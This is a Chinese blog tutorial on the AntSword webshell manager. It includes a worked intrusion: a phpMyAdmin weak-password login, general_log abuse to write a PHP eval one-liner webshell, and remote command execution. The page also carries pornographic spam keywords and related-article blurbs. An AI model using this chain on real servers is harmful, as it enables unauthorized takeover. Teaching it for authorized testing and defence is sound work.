国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用

2年前作者：Vista、分類：Toy博客閱讀(26)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

01 工具下載地址

https://github.com/AntSwordProject/

螞劍工具的下載分為兩個(gè)部分，一個(gè)是項(xiàng)目核心源碼antSword，另一個(gè)是加載器AntSword-Loader。我們依次進(jìn)行下載，并且進(jìn)行說(shuō)明

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

先點(diǎn)擊進(jìn)入antSword，點(diǎn)擊頁(yè)面右側(cè)"releases"，進(jìn)入工具的源碼下載頁(yè)面進(jìn)行源碼下載。

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全
而后點(diǎn)擊進(jìn)入AntSword-Loader，點(diǎn)擊頁(yè)面右側(cè)"releases"，進(jìn)入加載器下載頁(yè)面，根據(jù)操作系統(tǒng)類型選擇對(duì)應(yīng)的加載器，此處以Windows舉例。

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

下載完畢后，解壓加載器的壓縮包，雙擊打開AntSword.exe，出現(xiàn)如下圖界面后，加載對(duì)應(yīng)antSword地址即可

02 工具介紹

AntSword是一個(gè)開源、跨平臺(tái)的webshell管理工具，旨在滿足滲透測(cè)試人員、具有權(quán)限和/或授權(quán)的安全研究人員以及網(wǎng)站管理員的需求。

03 使用案例

攻擊者成功利用弱口令root/root登錄phpmyadmin 后臺(tái)后，利用 SQL 語(yǔ)句 show variables like ‘%general%’；查看general log 是否開啟

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

若發(fā)現(xiàn)日志讀寫功能關(guān)閉，于是使用 SQL 語(yǔ)句：SET GLOBAL general_log=‘on’； SHOW VARIABLES LIKE ‘%general%’；打開general_log 日志讀寫功能。

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

打開日志讀寫功能后，根據(jù)圖中 general_log_file 中的絕對(duì)路徑制作一個(gè)木馬文件：SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’

接著往 shell.php 寫入 SELECT '<?php eval($_POST["jkxy"])；?>

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

利用中國(guó)蟻劍工具連接一句話 shell.php，雙擊運(yùn)行AntSword.exe，等初始化完成后，再雙擊“AntSword.exe”即可正常啟動(dòng)，頁(yè)面功能如圖所示：

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

shell列表區(qū)鼠標(biāo)右鍵選擇添加webshell數(shù)據(jù)：

配置相關(guān)參數(shù)信息后連接測(cè)試成功，打開虛擬終端，輸入命令 whoami，發(fā)現(xiàn)命令執(zhí)行成功。

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全

Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用,Web安全,web安全,安全
至此攻擊者通過(guò)螞劍連接Webshell，成功獲取服務(wù)器權(quán)限，后續(xù)的執(zhí)行命令、文件管理、其他功能都在界面中可以進(jìn)行選擇：

這里對(duì)功能模塊做一個(gè)簡(jiǎn)單的介紹說(shuō)明：文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-518869.html

序號(hào)	模塊名稱	功能介紹
1	文件管理	文件管理是 AntSword 的幾大職能之一，主要涉及文件的邏輯組織和物理組織，目錄的結(jié)構(gòu)和管理。
2	虛擬終端	虛擬終端是 AntSword 的幾大職能之一，利用 Shell 模擬終端，在遠(yuǎn)程計(jì)算機(jī)上運(yùn)行應(yīng)用程序，就像他們是坐在這臺(tái)計(jì)算機(jī)前面一樣。
3	數(shù)據(jù)庫(kù)管理	數(shù)據(jù)庫(kù)管理是 AntSword 的幾大職能之一，通過(guò)圖形化的管理界面，利用 Shell 轉(zhuǎn)發(fā)功能，對(duì)遠(yuǎn)程服務(wù)器上的數(shù)據(jù)庫(kù)進(jìn)行快速、高效的管理
4	文件管理	可視化管理文件的增刪改查等操作
6	插件市場(chǎng)	插件開發(fā)者將插件提交至「插件市場(chǎng)」后，使用者可輕松獲取并使用插件。

04 參考資料

蟻劍官方文檔

https://www.yuque.com/antswordproject/antsword/lmwppk

到了這里，關(guān)于Web安全-AntSword（中國(guó)蟻劍）Webshell管理工具使用的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來(lái)自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

Web安全-Godzilla（哥斯拉）Webshell管理工具使用
點(diǎn)擊頁(yè)面右側(cè)\\\"releases\\\"，進(jìn)入工具的版本下載頁(yè)面。在個(gè)人終端安裝JDK1.8環(huán)境的情況下，下載jar包后打開即可 Payload類型運(yùn)行環(huán)境要求 JavaDynamicPayload java1.0及以上 CShapDynamicPayload .net2.0及以上 PhpDynamicPayload 4.3.0及以上 AspDynamicPayload 全版本哥斯拉由Java語(yǔ)言開發(fā)，內(nèi)置了3種Paylo
2024年02月13日
瀏覽(20)
中國(guó)蟻劍AntSword實(shí)戰(zhàn)
蟻劍加載器：AntSword-Loader 首次打開加載器時(shí)，界面如下圖所示：點(diǎn)擊「初始化」按鈕，選擇蟻劍的源代碼目錄，或者選擇一個(gè)空目錄作為蟻劍的工作目錄，加載器會(huì)自動(dòng)下載源代碼。待提示初始化完畢時(shí)，重新打開蟻劍加載器，即可看到蟻劍的主界面
2023年04月10日
瀏覽(21)
中國(guó)蟻劍AntSword反制 RCE漏洞復(fù)現(xiàn) windows環(huán)境上反彈shell 吊打攻擊你的黑客
中國(guó)蟻劍(AntSword) 是一款開源的跨平臺(tái)網(wǎng)站管理工具,它主要面向于合法授權(quán)的滲透測(cè)試安全人員以及進(jìn)行常規(guī)操作的網(wǎng)站管理員。 WebShell可以理解為網(wǎng)頁(yè)中的木馬程序，通過(guò)植入到你的web站點(diǎn)，在web頁(yè)面上的操作，控制你的計(jì)算機(jī) 操作系統(tǒng)，文件，權(quán)限，任意命令執(zhí)行。
2024年02月13日
瀏覽(23)
網(wǎng)絡(luò)安全——Webshell管理工具
一、什么是Webshell ? ?二、中國(guó)菜刀的使用從靶機(jī)（IP：192.168.30.35）的DVWA網(wǎng)站上傳文件， 1、菜刀的界面 2、新建一個(gè)“一句話木馬文件”，名字為phpma.php 3、登錄靶機(jī)的DVWA網(wǎng)站，調(diào)成Low級(jí)別，并到File Upload關(guān)卡，上傳剛剛創(chuàng)建好的phpma.php文件，注：要把路徑記住 ? ? 3、在菜
2024年02月02日
瀏覽(25)
Webshell管理工具
Webshell是以ASP、PHP、JSP或者CGl等網(wǎng)頁(yè)文件形式存在的一種代碼執(zhí)行環(huán)境，主要用于網(wǎng)站管理、服務(wù)器管理、權(quán)限管理等操作。 Webshell使用方法簡(jiǎn)單，只需上傳一個(gè)代碼文件，通過(guò)網(wǎng)址訪問(wèn)，便可進(jìn)行很多日常操作，極大地方便了使用者對(duì)網(wǎng)站和服務(wù)器的管理。正因如此，也有
2024年02月13日
瀏覽(17)
Shell管理工具流量分析-上（菜刀、蟻劍、冰蝎2.0流量分析）&入侵檢測(cè)、應(yīng)急響應(yīng)資料整理
本文將會(huì)從攻防的角度分析常用 webshell 管理工具（菜刀、蟻劍、冰蝎2.0，冰蝎3.0、哥斯拉將在下篇介紹）的流量特點(diǎn)，后半部分會(huì)整理一些有關(guān) webshell 入侵檢測(cè)和應(yīng)急響應(yīng)的文章先從最簡(jiǎn)單的開始吧，菜刀也算是比較早的 webshell 管理工具了，加密方式比較簡(jiǎn)單，這里分析
2024年02月02日
瀏覽(23)
【網(wǎng)絡(luò)安全】文件上傳漏洞及中國(guó)蟻劍安裝
文件上傳漏洞是指由于程序員未對(duì)上傳的文件進(jìn)行嚴(yán)格的驗(yàn)證和過(guò)濾，而導(dǎo)致的用戶可以越過(guò)其本身權(quán)限向服務(wù)器上上傳可執(zhí)行的動(dòng)態(tài)腳本文件。如常見的頭像上傳，圖片上傳，oa 辦公文件上傳，媒體上傳，允許用戶上傳文件，如果過(guò)濾不嚴(yán)格，惡意用戶利用文件上傳漏洞，
2024年02月04日
瀏覽(26)
webshell管理工具-哥斯拉( Godzilla)的安裝和基礎(chǔ)使用
哥斯拉相對(duì)于其他的webshell管理工具有過(guò)之而無(wú)不及：哥斯拉全部類型的shell均過(guò)市面所有靜態(tài)查殺哥斯拉流量加密過(guò)市面全部流量waf 哥斯拉的自帶的插件是冰蝎、蟻劍不能比擬的可見其強(qiáng)大之處，具體介紹可以在github上面去了解：https://github.com/BeichenDream/Godzilla 安裝及其簡(jiǎn)
2024年02月09日
瀏覽(47)
webshell管理工具-冰蝎(Behinder)的安裝和基礎(chǔ)使用(msf聯(lián)動(dòng),流量特征)
冰蝎是一款基于Java開發(fā)的動(dòng)態(tài)加密通信流量的新型Webshell客戶端，由于通信流量被加密，傳統(tǒng)的WAF、IDS 設(shè)備難以檢測(cè)，給威脅狩獵帶來(lái)較大挑戰(zhàn)。冰蝎其最大特點(diǎn)就是對(duì)交互流量進(jìn)行對(duì)稱加密，且加密密鑰是由隨機(jī)數(shù)函數(shù)動(dòng)態(tài)生成，因此該客戶端的流量幾乎無(wú)法檢測(cè)。 gi
2024年02月02日
瀏覽(26)
【webshell工具——蟻劍】蟻劍安裝使用教程
本篇內(nèi)容主要為webshell工具蟻劍的安裝以及使用，本人也通過(guò)查詢較多的文章，進(jìn)行了總結(jié)，由于是第一次接觸，有些地方可能存在問(wèn)題，歡迎評(píng)論區(qū)留言。 [步驟1] 蟻劍工具的下載廢話不多說(shuō)直接放鏈接加載(啟動(dòng))器：鏈接: https://github.com/AntSwordProject/AntSword-Loader 加速器選
2024年02月07日
瀏覽(21)

<span id="vnz4v"></span>

<span id="vnz4v"><th id="vnz4v"><button id="vnz4v"></button></th></span>

<ol id="vnz4v"></ol>

<var id="vnz4v"></var>